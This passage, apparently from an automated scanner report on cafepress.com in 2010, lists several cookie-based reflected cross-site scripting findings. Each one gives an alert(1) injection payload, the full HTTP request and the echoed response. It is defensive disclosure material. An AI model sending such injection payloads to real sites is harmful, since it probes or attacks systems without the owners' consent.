__utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAe64e3"-alert(1)-"4f4360aac81; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 59646
Date: Sun, 26 Dec 2010 13:48:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/
Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe64e3"-alert(1)-"4f4360aac81";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.23. http://www.cafepress.com/+buttons [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+buttons

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49536</script><script>alert(1)</script>00786d92ac was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=49536</script><script>alert(1)</script>00786d92ac; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW22
Cteonnt-Length: 59667
Date: Sun, 26 Dec 2010 13:48:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:52 GMT; path=/
Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:52 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59667

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '49536</script><script>alert(1)</script>00786d92ac'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.24. http://www.cafepress.com/+calendars [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+calendars

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f773c"-alert(1)-"fa99a9758e1 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+calendars HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAf773c"-alert(1)-"fa99a9758e1; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 57747
Date: Sun, 26 Dec 2010 13:49:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/
Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:15 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 57747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAf773c"-alert(1)-"fa99a9758e1";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.25. http://www.cafepress.com/+calendars [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+calendars

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 673c2</script><script>alert(1)</script>81eee94446c was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+calendars HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=673c2</script><script>alert(1)</script>81eee94446c; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 57764
Date: Sun, 26 Dec 2010 13:49:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:13 GMT; path=/
Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:13 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 57764

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '673c2</script><script>alert(1)</script>81eee94446c'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.26. http://www.cafepress.com/+clocks [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+clocks

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 405f7"-alert(1)-"c5d27bb0659 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+clocks HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA405f7"-alert(1)-"c5d27bb0659; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59340
Date: Sun, 26 Dec 2010 13:48:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/
Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA405f7"-alert(1)-"c5d27bb0659";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.27. http://www.cafepress.com/+clocks [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+clocks

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56c87</script><script>alert(1)</script>eb1ed059733 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+clocks HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=56c87</script><script>alert(1)</script>eb1ed059733; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW14
Cteonnt-Length: 59367
Date: Sun, 26 Dec 2010 13:48:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/
Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
